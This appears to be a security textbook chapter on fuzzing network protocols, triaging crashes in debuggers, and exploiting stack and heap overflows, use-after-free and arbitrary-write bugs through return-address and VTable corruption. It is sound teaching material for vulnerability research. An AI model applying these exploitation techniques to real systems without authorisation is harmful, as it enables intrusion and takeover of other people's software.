10
FINDING AND EXPLOITING SECURITY VULNERABILITIES

Parsing the structure of a complex network protocol can be tricky, especially if the protocol parser is written in a memory-unsafe programming language, such as C/C++. Any mistake could lead to a serious vulnerability, and the complexity of the protocol makes it difficult to analyze for such vulnerabilities. Capturing all the possible interactions between the incoming protocol data and the application code that processes it can be an impossible task.

This chapter explores some of the ways you can identify security vulnerabilities in a protocol by manipulating the network traffic going to and from an application. I’ll cover techniques such as fuzz testing and debugging that allow you to automate the process of discovering security issues. I’ll also put together a quick-start guide on triaging crashes to determine their root cause and their exploitability. Finally, I’ll discuss the exploitation of common security vulnerabilities, what modern platforms do to mitigate exploitation, and ways you can bypass these exploit mitigations.

Fuzz Testing

Any software developer knows that testing the code is essential to ensure that the software behaves correctly. Testing is especially important when it comes to security. Vulnerabilities exist where a software application’s behavior differs from its original intent. In theory, a good set of tests ensures that this doesn’t happen. However, when working with network protocols, it’s likely you won’t have access to any of the application’s tests, especially in proprietary applications. Fortunately, you can create your own tests.

Fuzz testing, commonly referred to as fuzzing, is a technique that feeds random, and sometimes not-so-random, data into a network protocol to force the processing application to crash in order to identify vulnerabilities. This technique tends to yield results no matter the complexity of the network. Fuzz testing involves producing multiple test cases, essentially modified network protocol structures, which are then sent to an application for processing. These test cases can be generated automatically using random modifications or under direction from the analyst.

The Simplest Fuzz Test

Developing a set of fuzz tests for a particular protocol is not necessarily a complex task. At its simplest, a fuzz test can just send random garbage to the network endpoint and see what happens.

For this example, we’ll use a Unix-style system and the Netcat tool. Execute the following on a shell to yield a simple fuzzer:

$ cat /dev/urandom | nc hostname port

This one-line shell command reads data from the system’s random number generator device using the cat command. The resulting random data is piped into netcat, which opens a connection to a specified endpoint as instructed.

This simple fuzzer will likely only yield a crash on simple protocols with few requirements. It’s unlikely that simple random generation would create data that meets the requirements of a more complex protocol, such as valid checksums or magic values. That said, you’d be surprised how often a simple fuzz test can give you valuable results; because it’s so quick to do, you might as well try it. Just don’t use this fuzzer on a live industrial control system managing a nuclear reactor!

Mutation Fuzzer

Often, you’ll need to be more selective about what data you send to a network connection to get the most useful information. The simplest technique in this case is to use existing protocol data, mutate it in some way, and then send it to the receiving application. This mutation fuzzer can work surprisingly well.

Let’s start with the simplest possible mutation fuzzer: a random bit flipper. Listing 10-1 shows a basic implementation of this type of fuzzer.

void SimpleFuzzer(const char* data, size_t length) {
   size_t position = RandomInt(length);
   size_t bit = RandomInt(8);

   char* copy = CopyData(data, length);
   copy[position] ^= (1 << bit);
   SendData(copy, length);
}

Listing 10-1: A simple random bit flipper mutation fuzzer

The SimpleFuzzer() function takes in the data to fuzz and the length of the data, and then generates a random number between 0 and the length of the data as the byte of the data to modify. Next, it decides which bit in that byte to change by generating a number between 0 and 7. Then it toggles the bit using the XOR operation and sends the mutated data to its network destination.

This function works when, by random chance, the fuzzer modifies a field in the protocol that is then used incorrectly by the application. For example, your fuzzer might modify a length field set to 0x40 by converting it to a length field of 0x80000040. This modification might result in an integer overflow if the application multiplies it by 4 (for an array of 32-bit values, for example). This modification could also cause the data to be malformed, which would confuse the parsing code and introduce other types of vulnerabilities, such as an invalid command identifier that results in the parser accessing an incorrect location in memory.

You could mutate more than a single bit in the data at a time. However, by mutating single bits, you’re more likely to localize the effect of the mutation to a similar area of the application’s code. Changing an entire byte could result in many different effects, especially if the value is used for a set of flags.

You’ll also need to recalculate any checksums or critical fields, such as total length values after the data has been fuzzed. Otherwise, the resulting parsing of the data might fail inside a verification step before it ever gets to the area of the application code that processes the mutated value.

Generating Test Cases

When performing more complex fuzzing, you’ll need to be smarter with your modifications and understand the protocol to target specific data types. The more data that passes into an application for parsing, the more complex the application will be. In many cases, inadequate checks are made at edge cases of protocol values, such as length values; then, if we already know how the protocol is structured, we can generate our own test cases from scratch.

Generating our own test cases gives us precise control over the protocol fields used and their sizes. However, test cases are more complex to develop, and careful thought must be given to the kinds you want to generate. Generating test cases allows you to test for types of protocol values that might never be used when you capture traffic to mutate. But the advantage is that you’ll exercise more of the application’s code and access areas of code that are likely to be less well tested.

Vulnerability Triaging

After you’ve run a fuzzer against a network protocol and the processing application has crashed, you’ve almost certainly found a bug. The next step is to find out whether that bug is a vulnerability and what type of vulnerability it might be, which depends on how and why the application crashed. To do this analysis, we use vulnerability triaging: taking a series of steps to search for the root cause of a crash. Sometimes the cause of the bug is clear and easy to track down. Sometimes a vulnerability causes corruption of an application seconds, if not hours, after the corruption occurs. This section describes ways to triage vulnerabilities and increase your chances of finding the root cause of a particular crash.

Debugging Applications

Different platforms allow different levels of control over your triaging. For an application running on Windows, macOS, or Linux, you can attach a debugger to the process. But on an embedded system, you might only have crash reports in the system log to go on. For debugging, I use CDB on Windows, GDB on Linux, and LLDB on macOS. All these debuggers are used from the command line, and I’ll provide some of the most useful commands for debugging your processes.

Starting Debugging

To start debugging, you’ll first need to attach the debugger to the application you want to debug. You can either run the application directly under the debugger from the command line or attach the debugger to an already-running process based on its process ID. Table 10-1 shows the various commands you need for running the three debuggers.

Table 10-1: Commands for Running Debuggers on Windows, Linux, and macOS

Debugger

New process

Attach process

CDB

cdb application.exe [arguments]

cdb -p PID

GDB

gdb --args application [arguments]

gdb -p PID

LLDB

lldb -- application [arguments]

lldb -p -PID

Because the debugger will suspend execution of the process after you’ve created or attached the debugger, you’ll need to run the process again. You can issue the commands in Table 10-2 in the debugger’s shell to start the process execution or resume execution if attaching. The table provides some simple names for such commands, separated by commas where applicable.

Table 10-2: Simplified Application Execution Commands

Debugger

Start execution

Resume execution

CDB

g

g

GDB

run, r

continue, c

LLDB

process launch, run, r

thread continue, c

When a new process creates a child process, it might be the child process that crashes rather than the process you’re debugging. This is especially common on Unix-like platforms, because some network servers will fork the current process to handle the new connection by creating a copy of the process. In these cases, you need to ensure you can follow the child process, not the parent process. You can use the commands in Table 10-3 to debug the child processes.

Table 10-3: Debugging the Child Processes

Debugger

Enable child process debugging

Disable child process debugging

CDB

.childdbg 1

.childdbg 0

GDB

set follow-fork-mode child

set follow-fork-mode parent

LLDB

process attach --name NAME --waitfor

exit debugger

There are some caveats to using these commands. On Windows with CDB, you can debug all processes from one debugger. However, with GDB, setting the debugger to follow the child will stop the debugging of the parent. You can work around this somewhat on Linux by using the set detach-on-fork off command. This command suspends debugging of the parent process while continuing to debug the child and then reattaches to the parent once the child exits. However, if the child runs for a long time, the parent might never be able to accept any new connections.

LLDB does not have an option to follow child processes. Instead, you need to start a new instance of LLDB and use the attachment syntax shown in Table 10-3 to automatically attach to new processes by the process name. You should replace the NAME in the process LLDB command with the process name to follow.

Analyzing the Crash

After debugging, you can run the application while fuzzing and wait for the program to crash. You should look for crashes that indicate corrupted memory—for example, crashes that occur when trying to read or write to invalid addresses, or trying to execute code at an invalid address. When you’ve identified an appropriate crash, inspect the state of the application to work out the reason for the crash, such as a memory corruption or an array-indexing error.

First, determine the type of crash that has occurred from the print out to the command window. For example, CDB on Windows typically prints the crash type, which will be something like Access violation, and the debugger will try to print the instruction at the current program location where the application crashed. For GDB and LLDB on Unix-like systems, you’ll instead see the signal type: the most common type is SIGSEGV for segmentation fault, which indicates that the application tried to access an invalid memory location.

As an example, Listing 10-2 shows what you’d see in CDB if the application tried to execute an invalid memory address.

(2228.1b44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000000`41414141 ??              ???

Listing 10-2: An example crash in CDB showing invalid memory address

After you’ve determined the type of crash, the next step is to determine which instruction caused the application to crash so you’ll know what in the process state you need to look up. Notice in Listing 10-2 that the debugger tried to print the instruction at which the crash occurred, but the memory location was invalid, so it returns a series of question marks. When the crash occurs due to reading or writing invalid memory, you’ll get a full instruction instead of the question marks. If the debugger shows that you’re executing valid instructions, you can disassemble the instructions surrounding the crash location using the commands in Table 10-4.

Table 10-4: Instruction Disassembly Commands

Debugger

Disassemble from crash location

Disassemble a specific location

CDB

u

u ADDR

GDB

disassemble

disassemble ADDR

LLDB

disassemble –frame

disassemble --start-address ADDR

To display the processor’s register state at the point of the crash, you can use the commands in Table 10-5.

Table 10-5: Displaying and Setting the Processor Register State

Debugger

Show general purpose registers

Show specific register

Set specific register

CDB

r

r @rcx

r @rcx = NEWVALUE

GDB

info registers

info registers rcx

set $rcx = NEWVALUE

LLDB

register read

register read rcx

register write rcx NEWVALUE

You can also use these commands to set the value of a register, which allows you to keep the application running by fixing the immediate crash and restarting execution. For example, if the crash occurred because the value of RCX was pointing to invalid reference memory, it’s possible to reset RCX to a valid memory location and continue execution. However, this might not continue successfully for very long if the application is already corrupted.

One important detail to note is how the registers are specified. In CDB, you use the syntax @NAME to specify a register in an expression (for example, when building up a memory address). For GDB and LLDB, you typically use $NAME instead. GDB and LLDB, also have a couple of pseudo registers: $pc, which refers to the memory location of the instruction currently executing (which would map to RIP for x64), and $sp, which refers to the current stack pointer.

When the application you’re debugging crashes, you’ll want to display how the current function in the application was called, because this provides important context to determine what part of the application triggered the crash. Using this context, you can narrow down which parts of the protocol you need to focus on to reproduce the crash.

You can get this context by generating a stack trace, which displays the functions that were called prior to the execution of the vulnerable function, including, in some cases, local variables and arguments passed to those functions. Table 10-6 lists commands to create a stack trace.

Table 10-6: Creating a Stack Trace

Debugger

Display stack trace

Display stack trace with arguments

CDB

K

Kb

GDB

backtrace

backtrace full

LLDB

backtrace

 

You can also inspect memory locations to determine what caused the current instruction to crash; use the commands in Table 10-7.

Table 10-7: Displaying Memory Values

Debugger

Display bytes/words, dwords, qwords

Display ten 1-byte values

CDB

db, dw, dd, dq ADDR

db ADDR L10

GDB

x/b, x/h, x/w, x/g ADDR

x/10b ADDR

LLDB

memory read --size 1,2,4,8

memory read --size 1 --count 10

Each debugger allows you to control how to display the values in memory, such as the size of the memory read (like 1 byte to 4 bytes) as well as the amount of data to print.

Another useful command determines what type of memory an address corresponds to, such as heap memory, stack memory, or a mapped executable. Knowing the type of memory helps narrow down the type of vulnerability. For example, if a memory value corruption has occurred, you can distinguish whether you’re dealing with a stack memory or heap memory corruption. You can use the commands in Table 10-8 to determine the layout of the process memory and then look up what type of memory an address corresponds to.

Table 10-8: Commands for Displaying the Process Memory Map

Debugger

Display process memory map

CDB

!address

GDB

info proc mappings

LLDB

No direct equivalent

Of course, there’s a lot more to the debugger that you might need to use in your triage, but the commands provided in this section should cover the basics of triaging a crash.

Example Crashes

Now let’s look at some examples of crashes so you’ll know what they look like for different types of vulnerabilities. I’ll just show Linux crashes in GDB, but the crash information you’ll see on different platforms and debuggers should be fairly similar. Listing 10-3 shows an example crash from a typical stack buffer overflow.

   GNU gdb 7.7.1
   (gdb) r
   Starting program: /home/user/triage/stack_overflow

   Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) x/i $pc
   => 0x41414141:  Cannot access memory at address 0x41414141
(gdb) x/16xw $sp-16
   0xbffff620:     0x41414141      0x41414141      0x41414141      0x41414141
   0xbffff630:     0x41414141      0x41414141      0x41414141      0x41414141
   0xbffff640:     0x41414141      0x41414141      0x41414141      0x41414141
   0xbffff650:     0x41414141      0x41414141      0x41414141      0x41414141

Listing 10-3: An example crash from a stack buffer overflow

The input data was a series of repeating A characters, shown here as the hex value 0x41. At , the program has crashed trying to execute the memory address 0x41414141. The fact that the address contains repeated copies of our input data is indicative of memory corruption, because the memory values should reflect the current execution state (such as pointers into the stack or heap)and are very unlikely to be the same value repeated. We double-check that the reason it crashed is that there’s no executable code at 0x41414141 by requesting GDB to disassemble instructions at the location of the program crash . GDB then indicates that it cannot access memory at that location. The crash doesn’t necessarily mean a stack overflow has occured, so to confirm we dump the current stack location . By also moving the stack pointer back 16 bytes at this point, we can see that our input data has definitely corrupted the stack.

The problem with this crash is that it’s difficult to determine which part is the vulnerable code. We crashed it by calling an invalid location, meaning the function that was executing the return instruction is no longer directly referenced and the stack is corrupted, making it difficult to extract calling information. In this case, you could look at the stack memory below the corruption to search for a return address left on the stack by the vulnerable function, which can be used to track down the culprit. Listing 10-4 shows a crash resulting from heap buffer overflow, which is considerably more involved than the stack memory corruption.

   user@debian:~/triage$ gdb ./heap_overflow
   GNU gdb 7.7.1

   (gdb) r
   Starting program: /home/user/triage/heap_overflow

   Program received signal SIGSEGV, Segmentation fault.
   0x0804862b in main ()
(gdb) x/i $pc
   => 0x804862b <main+112>:        mov    (%eax),%eax

(gdb) info registers $eax
   eax            0x41414141       1094795585

   (gdb) x/5i $pc
   => 0x804862b <main+112>:        mov    (%eax),%eax
      0x804862d <main+114>:        sub    $0xc,%esp
      0x8048630 <main+117>:        pushl  -0x10(%ebp)
     0x8048633 <main+120>:        call   *%eax
      0x8048635 <main+122>:        add    $0x10,%esp

   (gdb) disassemble
   Dump of assembler code for function main:
      ...
     0x08048626 <+107>:   mov    -0x10(%ebp),%eax
      0x08048629 <+110>:   mov    (%eax),%eax
   => 0x0804862b <+112>:   mov    (%eax),%eax
      0x0804862d <+114>:   sub    $0xc,%esp
      0x08048630 <+117>:   pushl  -0x10(%ebp)
      0x08048633 <+120>:   call   *%eax

   (gdb) x/w $ebp-0x10
   0xbffff708:     0x0804a030

(gdb) x/4w 0x0804a030
   0x804a030:      0x41414141      0x41414141      0x41414141      0x41414141

   (gdb) info proc mappings
   process 4578
   Mapped address spaces:

       Start Addr    End Addr       Size  Offset  objfile
        0x8048000   0x8049000     0x1000     0x0  /home/user/triage/heap_overflow
        0x8049000   0x804a000     0x1000     0x0  /home/user/triage/heap_overflow
       0x804a000   0x806b000    0x21000     0x0  [heap]
       0xb7cce000  0xb7cd0000     0x2000     0x0
       0xb7cd0000  0xb7e77000   0x1a7000     0x0  /lib/libc-2.19.so

Listing 10-4: An example crash from a heap buffer overflow

Again we get a crash, but it’s at a valid instruction that copies a value from the memory location pointed to by EAX back into EAX . It’s likely that the crash occurred because EAX points to invalid memory. Printing the register shows that the value of EAX is just our overflow character repeated, which is a sign of corruption.

We disassemble a little further and find that the value of EAX is being used as a memory address of a function that the instruction at will call. Dereferencing a value from another value indicates that the code being executed is a virtual function lookup from a Virtual Function Table (VTable). We confirm this by disassembling a few instructions prior to the crashing instruction . We see that a value is being read from memory, then that value is dereferenced (this would be reading the VTable pointer), and finally it is dereferenced again causing the crash.

Although analysis showing that the crash occurs when dereferencing a VTable pointer doesn’t immediately verify the corruption of a heap object, it’s a good indicator. To verify a heap corruption, we extract the value from memory and check whether it’s corrupted using the 0x41414141 pattern, which was our input value during testing . Finally, to check whether the memory is in the heap, we use the info proc mappings command to dump the process memory map; from that, we can see that the value 0x0804a030, which we extracted for , is within the heap region . Correlating the memory address with the mappings indicates that the memory corruption is isolated to this heap region.

Finding that the corruption is isolated to the heap doesn’t necessarily point to the root cause of the vulnerability, but we can at least find information on the stack to determine what functions were called to get to this point. Knowing what functions were called would narrow down the range of functions you would need to reverse engineer to determine the culprit.

Improving Your Chances of Finding the Root Cause of a Crash

Tracking down the root cause of a crash can be difficult. If the stack memory is corrupted, you lose the information on which function was being called at the time of the crash. For a number of other types of vulnerabilities, such as heap buffer overflows or use-after-free, it’s possible the crash will never occur at the location of the vulnerability. It’s also possible that the corrupted memory is set to a value that doesn’t cause the application to crash at all, leading to a change of application behavior that cannot easily be observed through a debugger.

Ideally, you want to improve your chances of identifying the exact point in the application that’s vulnerable without exerting a significant amount of effort. I’ll present a few ways of improving your chances of narrowing down the vulnerable point.

Rebuilding Applications with Address Sanitizer

If you’re testing an application on a Unix-like OS, there’s a reasonable chance you have the source code for the application. This alone provides you with many advantages, such as full debug information, but it also means you can rebuild the application and add improved memory error detection to improve your chances of discovering vulnerabilities.

One of the best tools to add this improved functionality when rebuilding is Address Sanitizer (ASan), an extension for the CLANG C compiler that detects memory corruption bugs. If you specify the -fsanitize=address option when running the compiler (you can usually specify this option using the CFLAGS environment variable), the rebuilt application will have additional instrumentation to detect common memory errors, such as memory corruption, out-of-bounds writes, use-after-free, and double-free.

The main advantage of ASan is that it stops the application as soon as possible after the vulnerable condition has occurred. If a heap allocation overflows, ASan stops the program and prints the details of the vulnerability to the shell console. For example, Listing 10-5 shows a part of the output from a simple heap overflow.

==3998==ERROR: AddressSanitizer: heap-buffer-overflow on address
0xb6102bf4 at pc 0x081087ae bp 0xbf9c64d8 sp 0xbf9c64d0
WRITE of size 1 at 0xb6102bf4 thread T0

    #0 0x81087ad (/home/user/triage/heap_overflow+0x81087ad)
    #1 0xb74cba62 (/lib/i386-linux-gnu/i686/cmov/libc.so.6+0x19a62)
    #2 0x8108430 (/home/user/triage/heap_overflow +0x8108430)

Listing 10-5: Output from ASan for a heap buffer overflow

Notice that the output contains the type of bug encountered (in this case a heap overflow), the memory address of the overflow write , the location in the application that caused the overflow , and the size of the overflow . By using the provided information with a debugger, as shown in the previous section, you should be able to track down the root cause of the vulnerability.

However, notice that the locations inside the application are just memory addresses. Source code files and line numbers would be more useful. To retrieve them in the stack trace, we need to specify some environment variables to enable symbolization, as shown in Listing 10-6. The application will also need to be built with debugging information, which we can do by passing by the compiler flag –g to CLANG.

$ export ASAN_OPTIONS=symbolize=1
$ export ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer-3.5
$ ./heap_overflow
=================================================================
==4035==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb6202bf4 at pc 0x081087ae bp 0xbf97a418 sp 0xbf97a410
WRITE of size 1 at 0xb6202bf4 thread T0
    #0 0x81087ad in main /home/user/triage/heap_overflow.c:8:3
    #1 0xb75a4a62 in __libc_start_main /build/libc-start.c:287
    #2 0x8108430 in _start (/home/user/triage/heap_overflow+0x8108430)

Listing 10-6: Output from ASan for a heap buffer overflow with symbol information

The majority of Listing 10-6 is the same as Listing 10-5. The big difference is that the crash’s location now reflects the location inside the original source code (in this case, starting at line 8, character 3 inside the file heap_overflow.c) instead of a memory location inside the program. Narrowing down the location of the crash to a specific line in the program makes it much easier to inspect the vulnerable code and determine the reason for the crash.

Windows Debug and Page Heap

On Windows, access to the source code of the application you’re testing is probably more restricted. Therefore, you’ll need to improve your chances for existing binaries. Windows comes with the Page Heap, which you can enable to improve your chances of tracking down a memory corruption.

You need to manually enable the Page Heap for the process you want to debug by running the following command as an administrator:

C:> gflags.exe -i appname.exe +hpa

The gflags application comes installed with the CDB debugger. The –i parameter allows you to specify the image filename to enable the Page Heap on. Replace appname.exe with the name of the application you’re testing. The +hpa parameter is what actually enables the Page Heap when the application next executes.

The Page Heap works by allocating special, OS-defined memory pages (called guard pages) after every heap allocation. If an application tries to read or write these special guard pages, an error will be raised and the debugger will be notified immediately, which is useful for detecting a heap buffer overflow. If the overflow writes immediately at the end of the buffer, the guard page will be touched by the application and an error will be raised instantly. Figure 10-1 shows how this process works in practice.

image

Figure 10-1: The Page Heap detecting an overflow

You might assume that using the Page Heap would be a good way of stopping heap memory corruptions from occurring, but the Page Heap wastes a huge amount of memory because each allocation needs a separate guard page. Setting up the guard pages requires calling a system call, which reduces allocation performance. On the whole, enabling the Page Heap for anything other than debugging sessions would not be a great idea.

Exploiting Common Vulnerabilities

After researching and analyzing a network protocol, you’ve fuzzed it and found some vulnerabilities you want to exploit. Chapter 9 describes many types of security vulnerabilities but not how to exploit those vulnerabilities, which is what I’ll discuss here. I’ll start with how you can exploit memory corruptions and then discuss some of the more unusual vulnerability types.

The aims of vulnerability exploitation depend on the purpose of your protocol analysis. If the analysis is on a commercial product, you might be looking for a proof of concept that clearly demonstrates the issue so the vendor can fix it: in that case, reliability isn’t as important as a clear demonstration of what the vulnerability is. On the other hand, if you’re developing an exploit for use in a Red Team exercise and are tasked with compromising some infrastructure, you might need an exploit that is reliable, works on many different product versions, and executes the next stage of your attack.

Working out ahead of time what your exploitation objectives are ensures you don’t waste time on irrelevant tasks. Whatever your goals, this section provides you with a good overview of the topic and more in-depth references for your specific needs. Let’s begin with exploiting memory corruptions.

Exploiting Memory Corruption Vulnerabilities

Memory corruptions, such as stack and heap overflows, are very common in applications written in memory-unsafe languages, such as C/C++. It’s difficult to write a complex application in such programming languages without introducing at least one memory corruption vulnerability. These vulnerabilities are so common that it’s relatively easy to find information about how to exploit them.

An exploit needs to trigger the memory corruption vulnerability in such a way that the state of the program changes to execute arbitrary code. This might involve hijacking the executing state of the processor and redirecting it to some executable code provided in the exploit. It might also mean modifying the running state of the application in such a way that previously inaccessible functionality becomes available.

The development of the exploit depends on the corruption type and what parts of the running application the corruption affects, as well as the kind of anti-exploit mitigations the application uses to make exploitation of a vulnerability more difficult to succeed. First, I’ll talk about the general principles of exploitation, and then I’ll consider more complex scenarios.

Stack Buffer Overflows

Recall that a stack buffer overflow occurs when code underestimates the length of a buffer to copy into a location on the stack, causing overflow that corrupts other data on the stack. Most serious of all, on many architectures the return address for a function is stored on the stack, and corruption of this return address gives the user direct control of execution, which you can use to execute any code you like. One of the most common techniques to exploit a stack buffer overflow is to corrupt the return address on the stack to point to a buffer containing shell code with instructions you want to execute when you achieve control. Successfully corrupting the stack in this way results in the application executing code it was not expecting.

In an ideal stack overflow, you have full control over the contents and length of the overflow, ensuring that you have full control over the values you overwrite on the stack. Figure 10-2 shows an ideal stack overflow vulnerability in operation.

image

Figure 10-2: A simple stack overflow exploit

The stack buffer we’ll overflow is below the return address for the function . When the overflow occurs, the vulnerable code fills up the buffer and then overwrites the return address with the value 0x12345678 . The vulnerable function completes its work and tries to return to its caller, but the calling address has been replaced with an arbitrary value pointing to the memory location of some shell code placed there by the exploit . The return instruction executes, and the exploit gains control over code execution.

Writing an exploit for a stack buffer overflow is simple enough in the ideal situation: you just need to craft your data into the overflowed buffer to ensure the return address points to a memory region you control. In some cases, you can even add the shell code to the end of the overflow and set the return address to jump to the stack. Of course, to jump into the stack, you’ll need to find the memory address of the stack, which might be possible because the stack won’t move very frequently.

However, the properties of the vulnerability you discovered can create issues. For example, if the vulnerability is caused by a C-style string copy, you won’t be able to use multiple 0 bytes in the overflow because C uses a 0 byte as the terminating character for the string: the overflow will stop immediately once a 0 byte is encountered in the input data. An alternative is to direct the shell code to an address value with no 0 bytes, for example, shell code that forces the application to do allocation requests.

Heap Buffer Overflows

Exploiting heap buffer overflows can be more involved than exploiting an overflow on the stack because heap buffers are often in a less predictable memory address. This means there is no guarantee you’ll find something as easily corruptible as the function return address in a known location. Therefore, exploiting a heap overflow requires different techniques, such as control of heap allocations and accurate placement of useful, corruptible objects.

The most common technique for gaining control of code execution for a heap overflow is to exploit the structure of C++ objects, specifically their use of VTables. A VTable is a list of pointers to functions that the object implements. The use of virtual functions allows a developer to make new classes derived from existing base classes and override some of the functionality, as illustrated in Figure 10-3.

image

Figure 10-3: VTable implementation

To support virtual functions, each allocated instance of a class must contain a pointer to the memory location of the function table . When a virtual function is called on an object, the compiler generates code that looks up the address of the virtual function table, then looks up the virtual function inside the table, and finally calls that address . Typically, we can’t corrupt the pointers in the table because it’s likely the table is stored in a read-only part of memory. But we can corrupt the pointer to the VTable and use that to gain code execution, as shown in Figure 10-4.

image

Figure 10-4: Gaining code execution through VTable address corruption

Use-After-Free Vulnerability

A use-after-free vulnerability is not so much a corruption of memory but a corruption of the state of the program. The vulnerability occurs when a memory block is freed but a pointer to that block is still stored by some part of the application. Later in the application’s execution, the pointer to the freed block is reused, possibly because the application code assumes the pointer is still valid. Between the time that the memory block is freed and the block pointer is reused, there’s opportunity to replace the contents of the memory block with arbitrary values and use that to gain code execution.

When a memory block is freed, it will typically be given back to the heap to be reused for another memory allocation; therefore, as long as you can issue an allocation request of the same size as the original allocation, there’s a strong possibility that the freed memory block would be reused with your crafted contents. We can exploit use-after-free vulnerabilities using a technique similar to abusing VTables in heap overflows, as illustrated in Figure 10-5.

The application first allocates an object p on the heap , which contains a VTable pointer we want to gain control of. Next, the application calls delete on the pointer to free the associated memory . However, the application doesn’t reset the value of p, so this object is free to be reused in the future.

image

Figure 10-5: An example of a use-after-free vulnerability

Although it’s shown in the figure as being free memory, the original values from the first allocation may not actually have been removed. This makes it difficult to track down the root cause of a use-after-free vulnerability. The reason is that the program might continue to work fine even if the memory is no longer allocated, because the contents haven’t changed.

Finally, the exploit allocates memory that is an appropriate size and has control over the contents of memory that p points to, which the heap allocator reuses as the allocation for p . If the application reuses p to call a virtual function, we can control the lookup and gain direct code execution.

Manipulating the Heap Layout

Most of the time, the key to successfully exploiting a heap-based vulnerability is in forcing a suitable allocation to occur at a reliable location, so it’s important to manipulate the layout of the heap. Because there is such a large number of different heap implementations on various platforms, I’m only able to provide general rules for heap manipulation.

The heap implementation for an application may be based on the virtual memory management features of the platform the application is executing on. For example, Windows has the API function VirtualAlloc, which allocates a block of virtual memory for the current process. However, using the OS virtual memory allocator introduces a couple of problems:

Poor performance Each allocation and free-up requires the OS to switch to kernel mode and back again.

Wasted memory At a minimum, virtual memory allocations are done at page level, which is usually at least 4096 bytes. If you allocate memory smaller than the page size, the rest of the page is wasted.

Due to these problems, most heap implementations call on the OS services only when absolutely necessary. Instead, they allocate a large memory region in one go and then implement user-level code to apportion that larger allocation into small blocks to service allocation requests.

Efficiently dealing with memory freeing is a further challenge. A naive implementation might just allocate a large memory region and then increment a pointer in that region for every allocation, returning the next available memory location when requested. This will work, but it’s virtually impossible to then free that memory: the larger allocation could only be freed once all suballocations had been freed. This might never happen in a long-running application.

An alternative to the simplistic sequential allocation is to use a free-list. A free-list maintains a list of freed allocations inside a larger allocation. When a new heap is created, the OS creates a large allocation in which the free-list would consist of a single freed block the size of the allocated memory. When an allocation request is made, the heap’s implementation scans the list of free blocks looking for a free block of sufficient size to contain the allocation. The implementation would then use that free block, allocate the request block at the start, and update the free-list to reflect the new free size.

When a block is freed, the implementation can add that block to the free-list. It could also check whether the memory before and after the newly freed block is also free and attempt to coalesce those free blocks to deal with memory fragmentation, which occurs when many small allocated blocks are freed, returning the blocks to available memory for reuse. However, free-list entries only record their individual sizes, so if an allocation larger than any of the free-list entries is requested, the implementation might need to further expand the OS allocated region to satisfy the request. An example of a free-list is shown in Figure 10-6.

image

Figure 10-6: An example of a simple free-list implementation

Using this heap implementation, you should be able to see how you would obtain a heap layout appropriate to exploiting a heap-based vulnerability. Say, for example, you know that the heap block you’ll overflow is 128 bytes; you can find a C++ object with a VTable pointer that’s at least the same size as the overflowable buffer. If you force the application to allocate a large number of these objects, they’ll end up being allocated sequentially in the heap. You can selectively free one of these objects (it doesn’t matter which one), and there’s a good chance that when you allocate the vulnerable buffer, it will reuse the freed block. Then you can execute your heap buffer overflow and corrupt the allocated object’s VTable to get code execution, as illustrated in Figure 10-7.

image

Figure 10-7: Allocating memory buffers to ensure correct layout

When manipulating heaps, the biggest challenge in a network attack is the limited control over memory allocations. If you’re exploiting a web browser, you can use JavaScript to trivially set up the heap layout, but for a network application, it’s more difficult. A good place to look for object allocations is in the creation of a connection. If each connection is backed by a C++ object, you can control allocation by just opening and closing connections. If that method isn’t suitable, you’ll almost certainly have to exploit the commands in the network protocol for appropriate allocations.

Defined Memory Pool Allocations

As an alternative to using an arbitrary free-list, you might use defined memory pools for different allocation sizes to group smaller allocations appropriately. For example, you might specify pools for allocations of 16, 64, 256, and 1024 bytes. When the request is made, the implementation will allocate the buffer based on the pool that most closely matches the size requested and is large enough to fit the allocation. For example, if you wanted a 50-byte allocation, it would go into the 64-byte pool, whereas a 512-byte allocation would go into the 1024-byte pool. Anything larger than 1024 bytes would be allocated using an alternative approach for large allocations. The use of sized memory pools reduces fragmentation caused by small allocations. As long as there’s a free entry for the requested memory in the sized pool, it will be satisfied, and larger allocations will not be blocked as much.

Heap Memory Storage

The final topic to discuss in relation to heap implementations is how information like the free-list is stored in memory. There are two methods. In one method, metadata, such as block size and whether the state is free or allocated, is stored alongside the allocated memory, which is known as in-band. In the other, known as out-of-band, metadata is stored elsewhere in memory. The out-of-band method is in many ways easier to exploit because you don’t have to worry about restoring important metadata when corrupting contiguous memory blocks, and it’s especially useful when you don’t know what values to restore for the metadata to be valid.

Arbitrary Memory Write Vulnerability

Memory corruption vulnerabilities are often the easiest vulnerabilities to find through fuzzing, but they’re not the only kind, as mentioned in Chapter 9. The most interesting is an arbitrary file write resulting from incorrect resource handling. This incorrect handling of resources might be due to a command that allows you to directly specify the location of a file write or due to a command that has a path canonicalization vulnerability, allowing you to specify the location relative to the current directory. However the vulnerability manifests, it’s useful to know what you would need to write to the filesystem to get code execution.

The arbitrary writing of memory, although it might be a direct consequence of a mistake in the application’s implementation, could also occur as a by-product of another vulnerability, such as a heap buffer overflow. Many old heap memory allocators would use a linked list structure to store the list of free blocks; if this linked list data were corrupted, any modification of the free-list could result in an arbitrary write of a value into an attacker-supplied location.

To exploit an arbitrary memory write vulnerability, you need to modify a location that can directly control execution. For example, you could target the VTable pointer of an object in memory and overwrite it to gain control over execution, as in the methods for other corruption vulnerabilities.

One advantage of an arbitrary write is that it can lead to subverting the logic of an application. As an example, consider the networked application shown in Listing 107. Its logic creates a memory structure to store important information about a connection, such as the network socket used and whether the user was authenticated as an administrator, when the connection is created.

struct Session {
    int socket;
    int is_admin;
};

Session* session = WaitForConnection();

Listing 10-7: A simple connection session structure

For this example, we’ll assume that some code checks, whether or not the session is an administrator session, will allow only certain tasks to be done, such as changing the system’s configuration. There is a direct command to execute a local shell command if you’re authenticated as an administrator in the session, as shown in Listing 10-8.

Command c = ReadCommand(session->socket);
if (c.command == CMD_RUN_COMMAND
    && session->is_admin) {
  system(c->data);
}

Listing 10-8: Opening the run command as an administrator

By discovering the location of the session object in memory, you can change the is_admin value from 0 to 1, opening the run command for the attacker to gain control over the target system. We could also change the socket value to point to another file, causing the application to write data to an arbitrary file when writing a response, because in most Unix-like platforms, file descriptors and sockets are effectively the same type of resource. You can use the write system call to write to a file, just as you can to write to the socket.

Although this is a contrived example, it should help you understand what happens in real-world networked applications. For any application that uses some sort of authentication to separate user and administrator responsibilities, you could typically subvert the security system in this way.

